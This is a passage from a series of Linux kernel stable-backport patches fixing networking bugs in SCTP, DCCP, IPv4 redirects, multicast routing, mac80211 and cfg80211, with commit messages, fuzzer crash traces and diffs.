[ 7858.221257] [] rest_init+0x135/0x140 [ 7858.221469] [] start_kernel+0x50e/0x51b [ 7858.221670] [] ? early_idt_handler_array+0x120/0x120 [ 7858.221894] [] x86_64_start_reservations+0x2a/0x2c [ 7858.222113] [] x86_64_start_kernel+0x13b/0x14a Fixes: 2942e9005056 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts") Signed-off-by: Nikolay Aleksandrov Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- include/linux/mroute.h | 2 +- include/linux/mroute6.h | 2 +- net/ipv4/ipmr.c | 3 ++- net/ipv4/route.c | 3 ++- net/ipv6/ip6mr.c | 5 +++-- net/ipv6/route.c | 4 +++- 6 files changed, 12 insertions(+), 7 deletions(-) diff --git a/include/linux/mroute.h b/include/linux/mroute.h index 79aaa9fc1a1..d5277fc3ce2 100644 --- a/include/linux/mroute.h +++ b/include/linux/mroute.h @@ -103,5 +103,5 @@ struct mfc_cache { struct rtmsg; extern int ipmr_get_route(struct net *net, struct sk_buff *skb, __be32 saddr, __be32 daddr, - struct rtmsg *rtm, int nowait); + struct rtmsg *rtm, int nowait, u32 portid); #endif diff --git a/include/linux/mroute6.h b/include/linux/mroute6.h index 66982e76405..f831155dc7d 100644 --- a/include/linux/mroute6.h +++ b/include/linux/mroute6.h @@ -115,7 +115,7 @@ struct mfc6_cache { struct rtmsg; extern int ip6mr_get_route(struct net *net, struct sk_buff *skb, - struct rtmsg *rtm, int nowait); + struct rtmsg *rtm, int nowait, u32 portid); #ifdef CONFIG_IPV6_MROUTE extern struct sock *mroute6_socket(struct net *net, struct sk_buff *skb); diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c index 89570f070e0..a429ac69af7 100644 --- a/net/ipv4/ipmr.c +++ b/net/ipv4/ipmr.c @@ -2190,7 +2190,7 @@ static int __ipmr_fill_mroute(struct mr_table *mrt, struct sk_buff *skb, int ipmr_get_route(struct net *net, struct sk_buff *skb, __be32 saddr, __be32 daddr, - struct rtmsg *rtm, int nowait) + struct rtmsg *rtm, int nowait, u32 portid) { struct mfc_cache *cache; struct mr_table *mrt; @@ -2235,6 +2235,7 @@ int ipmr_get_route(struct net *net, struct sk_buff *skb, return -ENOMEM; } + NETLINK_CB(skb2).portid = portid; skb_push(skb2, sizeof(struct iphdr)); skb_reset_network_header(skb2); iph = ip_hdr(skb2); diff --git a/net/ipv4/route.c b/net/ipv4/route.c index 624ca8ed350..93efb898bd0 100644 --- a/net/ipv4/route.c +++ b/net/ipv4/route.c @@ -2325,7 +2325,8 @@ static int rt_fill_info(struct net *net, __be32 dst, __be32 src, IPV4_DEVCONF_ALL(net, MC_FORWARDING)) { int err = ipmr_get_route(net, skb, fl4->saddr, fl4->daddr, - r, nowait); + r, nowait, portid); + if (err <= 0) { if (!nowait) { if (err == 0) diff --git a/net/ipv6/ip6mr.c b/net/ipv6/ip6mr.c index 107f75283b1..8344f686335 100644 --- a/net/ipv6/ip6mr.c +++ b/net/ipv6/ip6mr.c @@ -2275,8 +2275,8 @@ static int __ip6mr_fill_mroute(struct mr6_table *mrt, struct sk_buff *skb, return 1; } -int ip6mr_get_route(struct net *net, - struct sk_buff *skb, struct rtmsg *rtm, int nowait) +int ip6mr_get_route(struct net *net, struct sk_buff *skb, struct rtmsg *rtm, + int nowait, u32 portid) { int err; struct mr6_table *mrt; @@ -2321,6 +2321,7 @@ int ip6mr_get_route(struct net *net, return -ENOMEM; } + NETLINK_CB(skb2).portid = portid; skb_reset_transport_header(skb2); skb_put(skb2, sizeof(struct ipv6hdr)); diff --git a/net/ipv6/route.c b/net/ipv6/route.c index 6ebefd46f71..fb5010c27a2 100644 --- a/net/ipv6/route.c +++ b/net/ipv6/route.c @@ -2536,7 +2536,9 @@ static int rt6_fill_node(struct net *net, if (iif) { #ifdef CONFIG_IPV6_MROUTE if (ipv6_addr_is_multicast(&rt->rt6i_dst.addr)) { - int err = ip6mr_get_route(net, skb, rtm, nowait); + int err = ip6mr_get_route(net, skb, rtm, nowait, + portid); + if (err <= 0) { if (!nowait) { if (err == 0) From 5e6212f76e78dacb9d3a6f8c50500fd0bb820229 Mon Sep 17 00:00:00 2001 From: Anoob Soman Date: Wed, 5 Oct 2016 15:12:54 +0100 Subject: [PATCH 258/315] packet: call fanout_release, while UNREGISTERING a netdev commit 6664498280cf17a59c3e7cf1a931444c02633ed1 upstream. If a socket has FANOUT sockopt set, a new proto_hook is registered as part of fanout_add(). When processing a NETDEV_UNREGISTER event in af_packet, __fanout_unlink is called for all sockets, but prot_hook which was registered as part of fanout_add is not removed. Call fanout_release, on a NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the fanout_list. This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo() Signed-off-by: Anoob Soman Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/packet/af_packet.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c index 2d454a235e8..24f006623f7 100644 --- a/net/packet/af_packet.c +++ b/net/packet/af_packet.c @@ -3384,6 +3384,7 @@ static int packet_notifier(struct notifier_block *this, unsigned long msg, void } if (msg == NETDEV_UNREGISTER) { packet_cached_dev_reset(po); + fanout_release(sk); po->ifindex = -1; if (po->prot_hook.dev) dev_put(po->prot_hook.dev); From 2b8ed05b145d934b5679f3c224e0d959ef20fa5b Mon Sep 17 00:00:00 2001 From: Jiri Slaby Date: Fri, 21 Oct 2016 14:13:24 +0200 Subject: [PATCH 259/315] net: sctp, forbid negative length commit a4b8e71b05c27bae6bad3bdecddbc6b68a3ad8cf upstream. Most of getsockopt handlers in net/sctp/socket.c check len against sizeof some structure like: if (len < sizeof(int)) return -EINVAL; On the first look, the check seems to be correct. But since len is int and sizeof returns size_t, int gets promoted to unsigned size_t too. So the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is false. Fix this in sctp by explicitly checking len < 0 before any getsockopt handler is called. Note that sctp_getsockopt_events already handled the negative case. Since we added the < 0 check elsewhere, this one can be removed. If not checked, this is the result: UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19 shift exponent 52 is too large for 32-bit type 'int' CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014 0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3 ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270 0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422 Call Trace: [] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300 ... [] ? kmalloc_order+0x24/0x90 [] ? kmalloc_order_trace+0x24/0x220 [] ? __kmalloc+0x330/0x540 [] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp] [] ? sctp_getsockopt+0x10d/0x1b0 [sctp] [] ? sock_common_getsockopt+0xb9/0x150 [] ? SyS_getsockopt+0x1a5/0x270 Signed-off-by: Jiri Slaby Cc: Vlad Yasevich Cc: Neil Horman Cc: "David S. Miller" Cc: linux-sctp@vger.kernel.org Cc: netdev@vger.kernel.org Acked-by: Neil Horman Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/sctp/socket.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/net/sctp/socket.c b/net/sctp/socket.c index bdc3fb66717..86e7352422b 100644 --- a/net/sctp/socket.c +++ b/net/sctp/socket.c @@ -4259,7 +4259,7 @@ static int sctp_getsockopt_disable_fragments(struct sock *sk, int len, static int sctp_getsockopt_events(struct sock *sk, int len, char __user *optval, int __user *optlen) { - if (len <= 0) + if (len == 0) return -EINVAL; if (len > sizeof(struct sctp_event_subscribe)) len = sizeof(struct sctp_event_subscribe); @@ -5770,6 +5770,9 @@ SCTP_STATIC int sctp_getsockopt(struct sock *sk, int level, int optname, if (get_user(len, optlen)) return -EFAULT; + if (len < 0) + return -EINVAL; + sctp_lock_sock(sk); switch (optname) { From 0058a4c1b6209f86a29c4ecbca7e3ed55544d3b0 Mon Sep 17 00:00:00 2001 From: Marcelo Ricardo Leitner Date: Tue, 25 Oct 2016 14:27:39 -0200 Subject: [PATCH 260/315] sctp: validate chunk len before actually using it commit bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 upstream. Andrey Konovalov reported that KASAN detected that SCTP was using a slab beyond the boundaries. It was caused because when handling out of the blue packets in function sctp_sf_ootb() it was checking the chunk len only after already processing the first chunk, validating only for the 2nd and subsequent ones. The fix is to just move the check upwards so it's also validated for the 1st chunk. Reported-by: Andrey Konovalov Tested-by: Andrey Konovalov Signed-off-by: Marcelo Ricardo Leitner Reviewed-by: Xin Long Acked-by: Neil Horman Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/sctp/sm_statefuns.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c index d9cbecb62ac..df938b2ab84 100644 --- a/net/sctp/sm_statefuns.c +++ b/net/sctp/sm_statefuns.c @@ -3428,6 +3428,12 @@ sctp_disposition_t sctp_sf_ootb(struct net *net, return sctp_sf_violation_chunklen(net, ep, asoc, type, arg, commands); + /* Report violation if chunk len overflows */ + ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length)); + if (ch_end > skb_tail_pointer(skb)) + return sctp_sf_violation_chunklen(net, ep, asoc, type, arg, + commands); + /* Now that we know we at least have a chunk header, * do things that are type appropriate. */ @@ -3459,12 +3465,6 @@ sctp_disposition_t sctp_sf_ootb(struct net *net, } } - /* Report violation if chunk len overflows */ - ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length)); - if (ch_end > skb_tail_pointer(skb)) - return sctp_sf_violation_chunklen(net, ep, asoc, type, arg, - commands); - ch = (sctp_chunkhdr_t *) ch_end; } while (ch_end < skb_tail_pointer(skb)); From 9385be2ecff711df54a29af142efbf7391fbb37c Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Fri, 28 Oct 2016 13:40:24 -0700 Subject: [PATCH 261/315] net: clear sk_err_soft in sk_clone_lock() commit e551c32d57c88923f99f8f010e89ca7ed0735e83 upstream. At accept() time, it is possible the parent has a non zero sk_err_soft, leftover from a prior error. Make sure we do not leave this value in the child, as it makes future getsockopt(SO_ERROR) calls quite unreliable. Signed-off-by: Eric Dumazet Acked-by: Soheil Hassas Yeganeh Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/core/sock.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/core/sock.c b/net/core/sock.c index 6473fefbb2c..e3cb45411f3 100644 --- a/net/core/sock.c +++ b/net/core/sock.c @@ -1515,6 +1515,7 @@ struct sock *sk_clone_lock(const struct sock *sk, const gfp_t priority) } newsk->sk_err = 0; + newsk->sk_err_soft = 0; newsk->sk_priority = 0; /* * Before updating sk_refcnt, we must commit prior changes to memory From 985f2772eea323edb7f6a6ba4195b4fd9f26cb4c Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Sat, 29 Oct 2016 11:02:36 -0700 Subject: [PATCH 262/315] net: mangle zero checksum in skb_checksum_help() MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 upstream. Sending zero checksum is ok for TCP, but not for UDP. UDPv6 receiver should by default drop a frame with a 0 checksum, and UDPv4 would not verify the checksum and might accept a corrupted packet. Simply replace such checksum by 0xffff, regardless of transport. This error was caught on SIT tunnels, but seems generic. Signed-off-by: Eric Dumazet Cc: Maciej Å»enczykowski Cc: Willem de Bruijn Acked-by: Maciej Å»enczykowski Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/core/dev.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/core/dev.c b/net/core/dev.c index 408f6eea2fb..6494918b3ea 100644 --- a/net/core/dev.c +++ b/net/core/dev.c @@ -2234,7 +2234,7 @@ int skb_checksum_help(struct sk_buff *skb) goto out; } - *(__sum16 *)(skb->data + offset) = csum_fold(csum); + *(__sum16 *)(skb->data + offset) = csum_fold(csum) ?: CSUM_MANGLED_0; out_set_summed: skb->ip_summed = CHECKSUM_NONE; out: From 7507bf351090d32ad774960571a0c9c4cf3cd649 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 2 Nov 2016 18:04:24 -0700 Subject: [PATCH 263/315] dccp: do not send reset to already closed sockets commit 346da62cc186c4b4b1ac59f87f4482b47a047388 upstream. Andrey reported following warning while fuzzing with syzkaller WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290 Kernel panic - not syncing: panic_on_warn set ... CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000 ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a 0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00 Call Trace: [< inline >] __dump_stack lib/dump_stack.c:15 [] dump_stack+0xb3/0x10f lib/dump_stack.c:51 [] panic+0x1bc/0x39d kernel/panic.c:179 [] __warn+0x1cc/0x1f0 kernel/panic.c:542 [] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585 [] dccp_set_state+0x229/0x290 net/dccp/proto.c:83 [] dccp_close+0x612/0xc10 net/dccp/proto.c:1016 [] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415 [] sock_release+0x8e/0x1d0 net/socket.c:570 [] sock_close+0x16/0x20 net/socket.c:1017 [] __fput+0x29d/0x720 fs/file_table.c:208 [] ____fput+0x15/0x20 fs/file_table.c:244 [] task_work_run+0xf8/0x170 kernel/task_work.c:116 [< inline >] exit_task_work include/linux/task_work.h:21 [] do_exit+0x883/0x2ac0 kernel/exit.c:828 [] do_group_exit+0x10e/0x340 kernel/exit.c:931 [] get_signal+0x634/0x15a0 kernel/signal.c:2307 [] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807 [] exit_to_usermode_loop+0xe5/0x130 arch/x86/entry/common.c:156 [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 [] syscall_return_slowpath+0x1a8/0x1e0 arch/x86/entry/common.c:259 [] entry_SYSCALL_64_fastpath+0xc0/0xc2 Dumping ftrace buffer: (ftrace buffer empty) Kernel Offset: disabled Fix this the same way we did for TCP in commit 565b7b2d2e63 ("tcp: do not send reset to already closed sockets") Signed-off-by: Eric Dumazet Reported-by: Andrey Konovalov Tested-by: Andrey Konovalov Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/dccp/proto.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/net/dccp/proto.c b/net/dccp/proto.c index 6c7c78b8394..cb55fb91240 100644 --- a/net/dccp/proto.c +++ b/net/dccp/proto.c @@ -1012,6 +1012,10 @@ void dccp_close(struct sock *sk, long timeout) __kfree_skb(skb); } + /* If socket has been already reset kill it. */ + if (sk->sk_state == DCCP_CLOSED) + goto adjudge_to_death; + if (data_was_unread) { /* Unread data was tossed, send an appropriate Reset Code */ DCCP_WARN("ABORT with %u bytes unread\n", data_was_unread); From 261def571d19d3b4e2228643c5c0ac89f5e10d15 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 2 Nov 2016 19:00:40 -0700 Subject: [PATCH 264/315] dccp: fix out of bound access in dccp_v4_err() commit 6706a97fec963d6cb3f7fc2978ec1427b4651214 upstream. dccp_v4_err() does not use pskb_may_pull() and might access garbage. We only need 4 bytes at the beginning of the DCCP header, like TCP, so the 8 bytes pulled in icmp_socket_deliver() are more than enough. This patch might allow to process more ICMP messages, as some routers are still limiting the size of reflected bytes to 28 (RFC 792), instead of extended lengths (RFC 1812 4.3.2.3) Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/dccp/ipv4.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c index ebc54fef85a..294c642fbeb 100644 --- a/net/dccp/ipv4.c +++ b/net/dccp/ipv4.c @@ -212,7 +212,7 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info) { const struct iphdr *iph = (struct iphdr *)skb->data; const u8 offset = iph->ihl << 2; - const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset); + const struct dccp_hdr *dh; struct dccp_sock *dp; struct inet_sock *inet; const int type = icmp_hdr(skb)->type; @@ -222,11 +222,13 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info) int err; struct net *net = dev_net(skb->dev); - if (skb->len < offset + sizeof(*dh) || - skb->len < offset + __dccp_basic_hdr_len(dh)) { - ICMP_INC_STATS_BH(net, ICMP_MIB_INERRORS); - return; - } + /* Only need dccph_dport & dccph_sport which are the first + * 4 bytes in dccp header. + * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us. + */ + BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8); + BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8); + dh = (struct dccp_hdr *)(skb->data + offset); sk = inet_lookup(net, &dccp_hashinfo, iph->daddr, dh->dccph_dport, From 5b97e5f348cf50af84ca008f930d0e4259026bbc Mon Sep 17 00:00:00 2001 From: Marcelo Ricardo Leitner Date: Thu, 3 Nov 2016 17:03:41 -0200 Subject: [PATCH 265/315] sctp: assign assoc_id earlier in __sctp_connect commit 7233bc84a3aeda835d334499dc00448373caf5c0 upstream. sctp_wait_for_connect() currently already holds the asoc to keep it alive during the sleep, in case another thread release it. But Andrey Konovalov and Dmitry Vyukov reported an use-after-free in such situation. Problem is that __sctp_connect() doesn't get a ref on the asoc and will do a read on the asoc after calling sctp_wait_for_connect(), but by then another thread may have closed it and the _put on sctp_wait_for_connect will actually release it, causing the use-after-free. Fix is, instead of doing the read after waiting for the connect, do it before so, and avoid this issue as the socket is still locked by then. There should be no issue on returning the asoc id in case of failure as the application shouldn't trust on that number in such situations anyway. This issue doesn't exist in sctp_sendmsg() path. Reported-by: Dmitry Vyukov Reported-by: Andrey Konovalov Tested-by: Andrey Konovalov Signed-off-by: Marcelo Ricardo Leitner Reviewed-by: Xin Long Acked-by: Neil Horman Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/sctp/socket.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/net/sctp/socket.c b/net/sctp/socket.c index 86e7352422b..ede7c540ea2 100644 --- a/net/sctp/socket.c +++ b/net/sctp/socket.c @@ -1231,9 +1231,12 @@ static int __sctp_connect(struct sock* sk, timeo = sock_sndtimeo(sk, f_flags & O_NONBLOCK); - err = sctp_wait_for_connect(asoc, &timeo); - if ((err == 0 || err == -EINPROGRESS) && assoc_id) + if (assoc_id) *assoc_id = asoc->assoc_id; + err = sctp_wait_for_connect(asoc, &timeo); + /* Note: the asoc may be freed after the return of + * sctp_wait_for_connect. + */ /* Don't free association on exit. */ asoc = NULL; From 4d4c1fc6258af913f0a9a9595f2385e58f9f1d9a Mon Sep 17 00:00:00 2001 From: WANG Cong Date: Wed, 24 Sep 2014 17:07:53 -0700 Subject: [PATCH 266/315] neigh: check error pointer instead of NULL for ipv4_neigh_lookup() commit 2c1a4311b61072afe2309d4152a7993e92caa41c upstream. Fixes: commit f187bc6efb7250afee0e2009b6106 ("ipv4: No need to set generic neighbour pointer") Cc: David S. Miller Signed-off-by: Cong Wang Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv4/route.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/ipv4/route.c b/net/ipv4/route.c index 93efb898bd0..cbad9b896c7 100644 --- a/net/ipv4/route.c +++ b/net/ipv4/route.c @@ -714,7 +714,7 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow } n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw); - if (n) { + if (!IS_ERR(n)) { if (!(n->nud_state & NUD_VALID)) { neigh_event_send(n, NULL); } else { From 3816ef445e2b4762c6242b672b5bf72ec2bed7a9 Mon Sep 17 00:00:00 2001 From: Stephen Suryaputra Lin Date: Thu, 10 Nov 2016 11:16:15 -0500 Subject: [PATCH 267/315] ipv4: use new_gw for redirect neigh lookup commit 969447f226b451c453ddc83cac6144eaeac6f2e3 upstream. In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0 and then the state of the neigh for the new_gw is checked. If the state isn't valid then the redirected route is deleted. This behavior is maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway is assigned to peer->redirect_learned.a4 before calling ipv4_neigh_lookup(). After commit 5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again."), ipv4_neigh_lookup() is performed without the rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw) isn't zero, the function uses it as the key. The neigh is most likely valid since the old_gw is the one that sends the ICMP redirect message. Then the new_gw is assigned to fib_nh_exception. The problem is: the new_gw ARP may never gets resolved and the traffic is blackholed. So, use the new_gw for neigh lookup. Changes from v1: - use __ipv4_neigh_lookup instead (per Eric Dumazet). Fixes: 5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.") Signed-off-by: Stephen Suryaputra Lin Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv4/route.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/net/ipv4/route.c b/net/ipv4/route.c index cbad9b896c7..e59d6332458 100644 --- a/net/ipv4/route.c +++ b/net/ipv4/route.c @@ -713,7 +713,9 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow goto reject_redirect; } - n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw); + n = __ipv4_neigh_lookup(rt->dst.dev, new_gw); + if (!n) + n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev); if (!IS_ERR(n)) { if (!(n->nud_state & NUD_VALID)) { neigh_event_send(n, NULL); From 293573d9d0f2e63033011ba4c2c1072d640f45ec Mon Sep 17 00:00:00 2001 From: Felix Fietkau Date: Tue, 2 Aug 2016 11:13:41 +0200 Subject: [PATCH 268/315] mac80211: fix purging multicast PS buffer queue commit 6b07d9ca9b5363dda959b9582a3fc9c0b89ef3b5 upstream. The code currently assumes that buffered multicast PS frames don't have a pending ACK frame for tx status reporting. However, hostapd sends a broadcast deauth frame on teardown for which tx status is requested. This can lead to the "Have pending ack frames" warning on module reload. Fix this by using ieee80211_free_txskb/ieee80211_purge_tx_queue. Signed-off-by: Felix Fietkau Signed-off-by: Johannes Berg Signed-off-by: Willy Tarreau --- net/mac80211/cfg.c | 2 +- net/mac80211/tx.c | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c index e922bf3f422..11a10d580d9 100644 --- a/net/mac80211/cfg.c +++ b/net/mac80211/cfg.c @@ -1072,7 +1072,7 @@ static int ieee80211_stop_ap(struct wiphy *wiphy, struct net_device *dev) /* free all potentially still buffered bcast frames */ local->total_ps_buffered -= skb_queue_len(&sdata->u.ap.ps.bc_buf); - skb_queue_purge(&sdata->u.ap.ps.bc_buf); + ieee80211_purge_tx_queue(&local->hw, &sdata->u.ap.ps.bc_buf); ieee80211_vif_copy_chanctx_to_vlans(sdata, true); ieee80211_vif_release_channel(sdata); diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c index e960fbe9e27..129905342fc 100644 --- a/net/mac80211/tx.c +++ b/net/mac80211/tx.c @@ -335,7 +335,7 @@ static void purge_old_ps_buffers(struct ieee80211_local *local) skb = skb_dequeue(&ps->bc_buf); if (skb) { purged++; - dev_kfree_skb(skb); + ieee80211_free_txskb(&local->hw, skb); } total += skb_queue_len(&ps->bc_buf); } @@ -417,7 +417,7 @@ ieee80211_tx_h_multicast_ps_buf(struct ieee80211_tx_data *tx) if (skb_queue_len(&ps->bc_buf) >= AP_MAX_BC_BUFFER) { ps_dbg(tx->sdata, "BC TX buffer full - dropping the oldest frame\n"); - dev_kfree_skb(skb_dequeue(&ps->bc_buf)); + ieee80211_free_txskb(&tx->local->hw, skb_dequeue(&ps->bc_buf)); } else tx->local->total_ps_buffered++; @@ -2711,7 +2711,7 @@ ieee80211_get_buffered_bc(struct ieee80211_hw *hw, sdata = IEEE80211_DEV_TO_SUB_IF(skb->dev); if (!ieee80211_tx_prepare(sdata, &tx, skb)) break; - dev_kfree_skb_any(skb); + ieee80211_free_txskb(hw, skb); } info = IEEE80211_SKB_CB(skb); From f862950df36a3ad2c389270932b51bf2fca26e6d Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 5 Oct 2016 10:14:42 +0200 Subject: [PATCH 269/315] mac80211: discard multicast and 4-addr A-MSDUs commit ea720935cf6686f72def9d322298bf7e9bd53377 upstream. In mac80211, multicast A-MSDUs are accepted in many cases that they shouldn't be accepted in: * drop A-MSDUs with a multicast A1 (RA), as required by the spec in 9.11 (802.11-2012 version) * drop A-MSDUs with a 4-addr header, since the fourth address can't actually be useful for them; unless 4-address frame format is actually requested, even though the fourth address is still not useful in this case, but ignored Accepting the first case, in particular, is very problematic since it allows anyone else with possession of a GTK to send unicast frames encapsulated in a multicast A-MSDU, even when the AP has client isolation enabled. Signed-off-by: Johannes Berg Signed-off-by: Willy Tarreau --- net/mac80211/rx.c | 24 +++++++++++++++--------- 1 file changed, 15 insertions(+), 9 deletions(-) diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c index cd60be8d9ab..f8c7f46008e 100644 --- a/net/mac80211/rx.c +++ b/net/mac80211/rx.c @@ -1952,16 +1952,22 @@ ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx) if (!(status->rx_flags & IEEE80211_RX_AMSDU)) return RX_CONTINUE; - if (ieee80211_has_a4(hdr->frame_control) && - rx->sdata->vif.type == NL80211_IFTYPE_AP_VLAN && - !rx->sdata->u.vlan.sta) - return RX_DROP_UNUSABLE; + if (unlikely(ieee80211_has_a4(hdr->frame_control))) { + switch (rx->sdata->vif.type) { + case NL80211_IFTYPE_AP_VLAN: + if (!rx->sdata->u.vlan.sta) + return RX_DROP_UNUSABLE; + break; + case NL80211_IFTYPE_STATION: + if (!rx->sdata->u.mgd.use_4addr) + return RX_DROP_UNUSABLE; + break; + default: + return RX_DROP_UNUSABLE; + } + } - if (is_multicast_ether_addr(hdr->addr1) && - ((rx->sdata->vif.type == NL80211_IFTYPE_AP_VLAN && - rx->sdata->u.vlan.sta) || - (rx->sdata->vif.type == NL80211_IFTYPE_STATION && - rx->sdata->u.mgd.use_4addr))) + if (is_multicast_ether_addr(hdr->addr1)) return RX_DROP_UNUSABLE; skb->dev = dev; From 98db9446275f9354e1521c0790ea6bf5b0eecfab Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Tue, 15 Nov 2016 12:05:11 +0100 Subject: [PATCH 270/315] cfg80211: limit scan results cache size commit 9853a55ef1bb66d7411136046060bbfb69c714fa upstream. It's possible to make scanning consume almost arbitrary amounts of memory, e.g. by sending beacon frames with random BSSIDs at high rates while somebody is scanning. Limit the number of BSS table entries we're willing to cache to 1000, limiting maximum memory usage to maybe 4-5MB, but lower in practice - that would be the case for having both full-sized beacon and probe response frames for each entry; this seems not possible in practice, so a limit of 1000 entries will likely be closer to 0.5 MB. Signed-off-by: Johannes Berg Signed-off-by: Willy Tarreau --- net/wireless/core.h | 1 + net/wireless/scan.c | 69 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 70 insertions(+) diff --git a/net/wireless/core.h b/net/wireless/core.h index fd35dae547c..d06da43e265 100644 --- a/net/wireless/core.h +++ b/net/wireless/core.h @@ -69,6 +69,7 @@ struct cfg80211_registered_device { struct list_head bss_list; struct rb_root bss_tree; u32 bss_generation; + u32 bss_entries; struct cfg80211_scan_request *scan_req; /* protected by RTNL */ struct cfg80211_sched_scan_request *sched_scan_req; unsigned long suspend_at; diff --git a/net/wireless/scan.c b/net/wireless/scan.c index 81019ee3ddc..15ef12732d2 100644 --- a/net/wireless/scan.c +++ b/net/wireless/scan.c @@ -55,6 +55,19 @@ * also linked into the probe response struct. */ +/* + * Limit the number of BSS entries stored in mac80211. Each one is + * a bit over 4k at most, so this limits to roughly 4-5M of memory. + * If somebody wants to really attack this though, they'd likely + * use small beacons, and only one type of frame, limiting each of + * the entries to a much smaller size (in order to generate more + * entries in total, so overhead is bigger.) + */ +static int bss_entries_limit = 1000; +module_param(bss_entries_limit, int, 0644); +MODULE_PARM_DESC(bss_entries_limit, + "limit to number of scan BSS entries (per wiphy, default 1000)"); + #define IEEE80211_SCAN_RESULT_EXPIRE (30 * HZ) static void bss_free(struct cfg80211_internal_bss *bss) @@ -135,6 +148,10 @@ static bool __cfg80211_unlink_bss(struct cfg80211_registered_device *dev, list_del_init(&bss->list); rb_erase(&bss->rbn, &dev->bss_tree); + dev->bss_entries--; + WARN_ONCE((dev->bss_entries == 0) ^ list_empty(&dev->bss_list), + "rdev bss entries[%d]/list[empty:%d] corruption\n", + dev->bss_entries, list_empty(&dev->bss_list)); bss_ref_put(dev, bss); return true; } @@ -338,6 +355,40 @@ void cfg80211_bss_expire(struct cfg80211_registered_device *dev) __cfg80211_bss_expire(dev, jiffies - IEEE80211_SCAN_RESULT_EXPIRE); } +static bool cfg80211_bss_expire_oldest(struct cfg80211_registered_device *rdev) +{ + struct cfg80211_internal_bss *bss, *oldest = NULL; + bool 